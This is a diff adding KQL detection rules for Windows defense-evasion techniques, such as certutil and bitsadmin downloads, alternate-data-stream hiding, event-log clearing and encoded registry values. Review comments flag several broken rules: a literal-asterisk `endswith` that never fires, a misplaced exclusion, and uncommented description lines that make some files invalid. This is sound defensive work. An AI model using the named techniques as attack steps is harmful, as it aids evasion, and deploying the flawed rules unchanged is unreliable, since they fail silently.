diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql
new file mode 100644
index 00000000..4abcd922
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation with Colorcpl
+// Author: frack113
+// Date: 2022-01-21
+// Level: high
+// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
new file mode 100644
index 00000000..87f4b733
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious CustomShellHost Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - False positives are unlikely, investigate matches carefully.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql
new file mode 100644
index 00000000..abb8f62b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Diantz Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Very Possible
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..910ba681
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious DLL Loaded via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
new file mode 100644
index 00000000..b1f14456
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Double Extension Files
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-06-19
+// Level: high
+// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql
new file mode 100644
index 00000000..edefc408
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download From Direct IP Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
new file mode 100644
index 00000000..51f3c06c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download From File-Sharing Website Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+// - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or
ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql
new file mode 100644
index 00000000..3f0b508b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..5cd58835
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql
new file mode 100644
index 00000000..782ca154
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious DumpMinitool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: high
+// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql
new file mode 100644
index 00000000..e2e660c4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Environment Variable Has Been Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-20
+// Level: high
+// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*"
\ No newline at end of file
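Review bot: The closing term `RegistryKey endswith "\\Environment*"` is a literal comparison — KQL `endswith` has no wildcard support, so the asterisk is matched as a character, no real key path ends in `Environment*`, and the rule can never fire. The trailing `*` presumably carries over from the source rule's `\Environment\*` and is meant to cover any value under that key; in DeviceRegistryEvents the value name is already a separate column (RegistryValueName), so the key test should read `RegistryKey endswith "\\Environment"`. The RegistryValueData prefix list in front of it is unaffected.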
diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql
new file mode 100644
index 00000000..9c7bc5b3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious Eventlog Clearing or Configuration Change Activity
+// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-09-26
+// Level: high
+// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
+This technique were seen used by threat actors and ransomware strains in order to evade defenses.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Maintenance activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))))
\ No newline
at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
new file mode 100644
index 00000000..806398c0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Executable File Creation
+// Author: frack113
+// Date: 2022-09-05
+// Level: high
+// Description: Detect creation of suspicious executable file names.
+Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
new file mode 100644
index 00000000..d0d6b0f7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of InstallUtil Without Log
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
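Review bot: In the eventlog rule the msiexec exclusion `not((ProcessCommandLine contains " sl " and InitiatingProcessFolderPath in~ (...)))` is parenthesised inside the third `or` branch (the ClearEventLog / wmic selection), while the `" sl "` token it is meant to tune out is matched only in the first branch (wevtutil), so an msiexec-spawned `wevtutil sl` still alerts and the exclusion is effectively dead. The three selection groups should be wrapped in one outer parenthesis and the `and (not(...))` applied to that whole group. Separately, the second description line `+This technique were seen used by threat actors...` is emitted without a `//` prefix, which leaves a bare sentence in the query body and makes the file invalid KQL; the same happens in suspicious_executable_file_creation with `Some strings look for suspicious file extensions...`, which suggests the converter's handling of multi-line descriptions rather than a one-off.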
diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql
new file mode 100644
index 00000000..826d9baa
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Extract data from cab file and hide it in an alternate data stream
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
new file mode 100644
index 00000000..920e28f3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious File Created Via OneNote Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-09
+// Level: high
+// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.
+// - Occasional FPs might occur if OneNote is used internally to share different embedded documents
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
new file mode 100644
index 00000000..086d74c8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Creation In Uncommon AppData Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
new file mode 100644
index 00000000..5ba94f04
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
new file mode 100644
index 00000000..9ea93132
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or
ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..b4f891fd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
new file mode 100644
index 00000000..24a29b1e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Files in Default GPO Folder
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036.005, attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
new file mode 100644
index 00000000..3947f385
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HH.EXE Execution
+// Author: Maxim Pavlunin
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
